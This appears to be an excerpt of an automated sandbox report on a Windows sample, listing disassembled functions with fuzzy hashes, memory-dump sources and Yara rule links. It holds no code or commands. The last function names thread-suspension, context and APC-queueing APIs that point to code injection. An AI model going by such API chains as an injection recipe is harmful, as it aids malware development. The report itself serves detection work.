                                                • Associated: 00000000.00000002.2087734542.00007FF65871F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF658724000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087770844.00007FF658727000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff658550000_GJRX21GBj3.jbxd
                                                Similarity
                                                • API ID: CounterPerformanceQuery
                                                • String ID:
                                                • API String ID: 2783962273-0
                                                • Opcode ID: 0046277a4a63688f8226c38b0a832a454e8e1dc3ef7b8787d107a71e26a4fca3
                                                • Instruction ID: efed2282879e411c4e518d76c0c9b55417e767916900af83f6caa6b64a05bbfd
                                                • Opcode Fuzzy Hash: 0046277a4a63688f8226c38b0a832a454e8e1dc3ef7b8787d107a71e26a4fca3
                                                • Instruction Fuzzy Hash: 8802A562A59B4285FA95DB34985037867A1BF48B94F5CC235CD4FF2BA1DF3CE482C208
                                                Function 00007FF65855B2C0 Relevance: .3, Instructions: 320COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087187763.00007FF658551000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF658550000, based on PE: true
                                                • Associated: 00000000.00000002.2087176627.00007FF658550000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087349436.00007FF658669000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087694793.00007FF6586A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF658719000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF65871F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF658724000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087770844.00007FF658727000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff658550000_GJRX21GBj3.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 21cb066ba30a2d58ebcf8ae559d9ba3061f44fe4dc0b64825ad821ff6f3f83a3
                                                • Instruction ID: 4adfc0492b0bb3058a122d19e2d163cb15bc2eeb33ead989797426add29844f6
                                                • Opcode Fuzzy Hash: 21cb066ba30a2d58ebcf8ae559d9ba3061f44fe4dc0b64825ad821ff6f3f83a3
                                                • Instruction Fuzzy Hash: 39D18AB3A14B8883EB998F25E048AA837A9F359BC8F584035DE0E5BB44DF38D644C754
                                                Function 00007FF6585D2430 Relevance: .3, Instructions: 270COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087187763.00007FF658551000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF658550000, based on PE: true
                                                • Associated: 00000000.00000002.2087176627.00007FF658550000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087349436.00007FF658669000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087694793.00007FF6586A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF658719000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF65871F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF658724000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087770844.00007FF658727000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff658550000_GJRX21GBj3.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 71e65aae111a7e0b8408b2be1a0ef47df2ba8d263406ac7333b0cd756308d3e6
                                                • Instruction ID: 5d73233db330ba7a77501056077aeef5ecfc5aab49609587fb31e98bc2354d98
                                                • Opcode Fuzzy Hash: 71e65aae111a7e0b8408b2be1a0ef47df2ba8d263406ac7333b0cd756308d3e6
                                                • Instruction Fuzzy Hash: E6615B94E2814695EE59AB72EC510F992611F56BC0F4C6031E81EFBFA3EE1CE41A874C
                                                Function 00007FF658567DC0 Relevance: .3, Instructions: 259COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087187763.00007FF658551000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF658550000, based on PE: true
                                                • Associated: 00000000.00000002.2087176627.00007FF658550000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087349436.00007FF658669000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087694793.00007FF6586A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF658719000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF65871F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF658724000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087770844.00007FF658727000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff658550000_GJRX21GBj3.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3a5daeb43570b4afd4445f940d7c48c5abcaba4c72eaa1ed16e83e212e647b85
                                                • Instruction ID: f518d80861bbe5910a15bc00e205347f10ae6ec8d39a319b0d4fd6dd3d161ee1
                                                • Opcode Fuzzy Hash: 3a5daeb43570b4afd4445f940d7c48c5abcaba4c72eaa1ed16e83e212e647b85
                                                • Instruction Fuzzy Hash: D0D18232A49B8682E7A0DB35E84037E73A1FB44798F584136D94EA3B91DF3CE4958708
                                                Function 00007FF658600B00 Relevance: .3, Instructions: 256COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087187763.00007FF658551000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF658550000, based on PE: true
                                                • Associated: 00000000.00000002.2087176627.00007FF658550000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087349436.00007FF658669000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087694793.00007FF6586A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF658719000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF65871F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF658724000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087770844.00007FF658727000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff658550000_GJRX21GBj3.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c5d97b2ee4cf179bc4efdbce6b8c0359fec989a8c2a2af27bcf7251089b9314c
                                                • Instruction ID: 4bbcba5113666716e7ac663f43f9de5c3e73a330690efadd6acbad37178558ef
                                                • Opcode Fuzzy Hash: c5d97b2ee4cf179bc4efdbce6b8c0359fec989a8c2a2af27bcf7251089b9314c
                                                • Instruction Fuzzy Hash: 1071F533B18295C6E7258B3994405BD7761EB88B90F5D8031DE4DD3B42EE3CE981DB49
                                                Function 00007FF65857B850 Relevance: .3, Instructions: 254COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087187763.00007FF658551000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF658550000, based on PE: true
                                                • Associated: 00000000.00000002.2087176627.00007FF658550000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087349436.00007FF658669000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087694793.00007FF6586A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF658719000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF65871F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF658724000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087770844.00007FF658727000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff658550000_GJRX21GBj3.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7f3baeb11f508d9df96f7dec6d674138a29e73c9ff3c206315f0f1c2669d3fcb
                                                • Instruction ID: 973b219fa40080eaeedae9716a719f3c2b9e231bb358812f3b53590910b97d70
                                                • Opcode Fuzzy Hash: 7f3baeb11f508d9df96f7dec6d674138a29e73c9ff3c206315f0f1c2669d3fcb
                                                • Instruction Fuzzy Hash: 66C18E32A58A4682FA848B25E84417877A5FB447E0F4DC235C96EE7FA1DF3CE491C309
                                                Function 00007FF658585060 Relevance: .2, Instructions: 249COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087187763.00007FF658551000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF658550000, based on PE: true
                                                • Associated: 00000000.00000002.2087176627.00007FF658550000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087349436.00007FF658669000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087694793.00007FF6586A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF658719000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF65871F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF658724000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087770844.00007FF658727000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff658550000_GJRX21GBj3.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: fb4f35875fc796b0f3ddd2d634b66067a0974921a0bb6a5596afbdc2a062e503
                                                • Instruction ID: ff42f1937e069535509b426fee40868b33eaea91b34afddc296c8208c04a7d95
                                                • Opcode Fuzzy Hash: fb4f35875fc796b0f3ddd2d634b66067a0974921a0bb6a5596afbdc2a062e503
                                                • Instruction Fuzzy Hash: 81C17631A68B4681EA908B35E81027C77A5FB457A4F5C4236C96EA7FA0DF3CE591C708
                                                Function 00007FF658557EA0 Relevance: .2, Instructions: 238COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087187763.00007FF658551000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF658550000, based on PE: true
                                                • Associated: 00000000.00000002.2087176627.00007FF658550000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087349436.00007FF658669000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087694793.00007FF6586A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF658719000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF65871F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF658724000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087770844.00007FF658727000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff658550000_GJRX21GBj3.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 86c9ebb636796ca0e2a1abc168f63624881ec9cfa17a1a52ac6cfbaa34e87d82
                                                • Instruction ID: 8f6827f492e24d24fc26cada5940442f40a678e01e3b5e92c4ca9bce77d573e1
                                                • Opcode Fuzzy Hash: 86c9ebb636796ca0e2a1abc168f63624881ec9cfa17a1a52ac6cfbaa34e87d82
                                                • Instruction Fuzzy Hash: 4C91CBB3A20B5987DB58CF39D84122933A1F744BE8B145239CE6D57B98DF38D851CB80
                                                Function 00007FF65865E3C0 Relevance: .2, Instructions: 150COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087187763.00007FF658551000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF658550000, based on PE: true
                                                • Associated: 00000000.00000002.2087176627.00007FF658550000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087349436.00007FF658669000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087694793.00007FF6586A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF658719000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF65871F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF658724000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087770844.00007FF658727000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff658550000_GJRX21GBj3.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 409c229b9efc82fb36608608548fe9079849a2670775322de54876e08707bc46
                                                • Instruction ID: 098938a1fc89e046a50e84ed727e8218785ef0b53bedf1643fb40660202bf65f
                                                • Opcode Fuzzy Hash: 409c229b9efc82fb36608608548fe9079849a2670775322de54876e08707bc46
                                                • Instruction Fuzzy Hash: 394192A1A0915299EB44AB72EC818FA66505F46FC0F4C8031ED1EF7FA3DE1CE5468749
                                                Function 00007FF658569660 Relevance: .1, Instructions: 125COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087187763.00007FF658551000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF658550000, based on PE: true
                                                • Associated: 00000000.00000002.2087176627.00007FF658550000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087349436.00007FF658669000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087694793.00007FF6586A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF658719000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF65871F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF658724000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087770844.00007FF658727000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff658550000_GJRX21GBj3.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1520ecc627e78f6f296a930b5ad1567f454733ec3bf030dcbb6867c4c223546e
                                                • Instruction ID: 1f60d86c70578a1339d06f8be497069d5b1ca3afa46f810fe1c3f18886616666
                                                • Opcode Fuzzy Hash: 1520ecc627e78f6f296a930b5ad1567f454733ec3bf030dcbb6867c4c223546e
                                                • Instruction Fuzzy Hash: ED412861E6CB4A41E9958B37A94063892529F5B7E0F2CC731D91EBBFD1EF3CB0854208
                                                Function 00007FF65857BC70 Relevance: .1, Instructions: 116COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087187763.00007FF658551000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF658550000, based on PE: true
                                                • Associated: 00000000.00000002.2087176627.00007FF658550000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087349436.00007FF658669000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087694793.00007FF6586A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF658719000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF65871F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF658724000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087770844.00007FF658727000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff658550000_GJRX21GBj3.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d01d92c36cf49476ab487aa00d9e6613e9ef98e3604ac2f9606348045db3d20f
                                                • Instruction ID: 06e01ac96a12101ed7a68b687f812b1c0b49ffc2b52f60ffdc67fc6bc0361639
                                                • Opcode Fuzzy Hash: d01d92c36cf49476ab487aa00d9e6613e9ef98e3604ac2f9606348045db3d20f
                                                • Instruction Fuzzy Hash: BA412721B15B4E42FA95873A51116B95252AF5A7C4F1CCB32DE0EF6F92EF3CF0418205
                                                Function 00007FF6586009D0 Relevance: .1, Instructions: 91COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087187763.00007FF658551000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF658550000, based on PE: true
                                                • Associated: 00000000.00000002.2087176627.00007FF658550000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087349436.00007FF658669000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087694793.00007FF6586A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF658719000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF65871F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF658724000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087770844.00007FF658727000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff658550000_GJRX21GBj3.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4f5e3a5f36c742acf23e0f67f47f7e35e288f742c5cbb7463714353c7f299c5f
                                                • Instruction ID: 4995393b6d73f26613ce4e869a517c35993a7b96c2aaaa3d0d68e8a0da4bee5c
                                                • Opcode Fuzzy Hash: 4f5e3a5f36c742acf23e0f67f47f7e35e288f742c5cbb7463714353c7f299c5f
                                                • Instruction Fuzzy Hash: 4D21A732F09685C6D7189F25E4405AEA362FF98749F189534DA8C97B5AEE3CC851C708
                                                Function 00007FF658582580 Relevance: .1, Instructions: 71COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087187763.00007FF658551000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF658550000, based on PE: true
                                                • Associated: 00000000.00000002.2087176627.00007FF658550000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087349436.00007FF658669000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087694793.00007FF6586A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF658719000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF65871F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF658724000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087770844.00007FF658727000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff658550000_GJRX21GBj3.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a6ce15b705df1a525a362b136f320cd7ebac4ee5d2a4b91d5a0a8bc25f3be7d2
                                                • Instruction ID: d407a8db24c56dffce5066567edaeef0c298932cfa53728affb8d6b2607d3f05
                                                • Opcode Fuzzy Hash: a6ce15b705df1a525a362b136f320cd7ebac4ee5d2a4b91d5a0a8bc25f3be7d2
                                                • Instruction Fuzzy Hash: A721DA22B2824142EFE4873AA29667E1350EB897C0F9C6031DE0D93E46DD1CE4818A08
                                                Function 00007FF6585535A0 Relevance: .1, Instructions: 67COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087187763.00007FF658551000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF658550000, based on PE: true
                                                • Associated: 00000000.00000002.2087176627.00007FF658550000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087349436.00007FF658669000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087694793.00007FF6586A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF658719000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF65871F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF658724000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087770844.00007FF658727000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff658550000_GJRX21GBj3.jbxd
                                                Similarity
                                                • API ID: ExceptionFailFastRaise$Sleep
                                                • String ID:
                                                • API String ID: 3706814929-0
                                                • Opcode ID: d20306b9d74ff1c3dcfd4b0331d8a064e7e4a167fcad3e41ad7a5e05a6cf805d
                                                • Instruction ID: 7d0894177f64ac2f9074819bea4f0531d8a01f5df1a27522ef5df339b90744e8
                                                • Opcode Fuzzy Hash: d20306b9d74ff1c3dcfd4b0331d8a064e7e4a167fcad3e41ad7a5e05a6cf805d
                                                • Instruction Fuzzy Hash: 6821F932B1864642FBA09B7AF494B6B7651EBD4780F894031EE4FE2E94ED3CD0098708
                                                Function 00007FF658600980 Relevance: .1, Instructions: 56COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087187763.00007FF658551000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF658550000, based on PE: true
                                                • Associated: 00000000.00000002.2087176627.00007FF658550000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087349436.00007FF658669000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087694793.00007FF6586A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF658719000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF65871F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF658724000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087770844.00007FF658727000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff658550000_GJRX21GBj3.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c91ad571f7de6f39c899d6f2da8f9893909e3427eea3a74341dff6ea753e2615
                                                • Instruction ID: b20ab173f8006c878f2ac7366c1b84a237b5ec0ead73a1299727491a0a60e340
                                                • Opcode Fuzzy Hash: c91ad571f7de6f39c899d6f2da8f9893909e3427eea3a74341dff6ea753e2615
                                                • Instruction Fuzzy Hash: 1A11C232F0914587DB188F25E4405AAA362FB88748F18D534DA8CDBB4DFE3CC8818708
                                                Function 00007FF6585D2740 Relevance: .0, Instructions: 34COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087187763.00007FF658551000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF658550000, based on PE: true
                                                • Associated: 00000000.00000002.2087176627.00007FF658550000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087349436.00007FF658669000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087694793.00007FF6586A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF658719000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF65871F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF658724000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087770844.00007FF658727000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff658550000_GJRX21GBj3.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d163aa0276cdbe7ab7494f518498ab7c341e223f84200f380b0b19d626e36546
                                                • Instruction ID: 092155b84debfb5656330c0a0744604691aeb981c3bbf1c50d804e0ce0c06a43
                                                • Opcode Fuzzy Hash: d163aa0276cdbe7ab7494f518498ab7c341e223f84200f380b0b19d626e36546
                                                • Instruction Fuzzy Hash: 9AF09651E2520685DE55BB32FC450F962609F45780F485034D91EABF52EE2CE4458748
                                                Function 00007FF658551988 Relevance: .0, Instructions: 31COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087187763.00007FF658551000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF658550000, based on PE: true
                                                • Associated: 00000000.00000002.2087176627.00007FF658550000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087349436.00007FF658669000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087694793.00007FF6586A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF658719000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF65871F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF658724000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087770844.00007FF658727000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff658550000_GJRX21GBj3.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: fa66132e240f2b1eda32182dae148967ed333e9fb7865c2107637e77a9023a67
                                                • Instruction ID: a7f32262c88462ab4824dde9258b5b0eecd9c4a7fef4b337e532330c1010db77
                                                • Opcode Fuzzy Hash: fa66132e240f2b1eda32182dae148967ed333e9fb7865c2107637e77a9023a67
                                                • Instruction Fuzzy Hash: 1DF08C50E2810685EE48BF32EC410B892701F4A780F4C2031E80EFBE63AD1CE809434C
                                                Function 00007FF658552C00 Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 144librarythreadloaderCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087187763.00007FF658551000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF658550000, based on PE: true
                                                • Associated: 00000000.00000002.2087176627.00007FF658550000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087349436.00007FF658669000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087694793.00007FF6586A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF658719000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF65871F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF658724000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087770844.00007FF658727000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff658550000_GJRX21GBj3.jbxd
                                                Similarity
                                                • API ID: ConditionMaskThread$AddressProc$ContextCurrentErrorInfoLastLibraryLoadProcessResumeSuspendVerifyVersion
                                                • String ID: IsWow64Process2$QueueUserAPC2$kernel32
                                                • API String ID: 2652322181-269241671
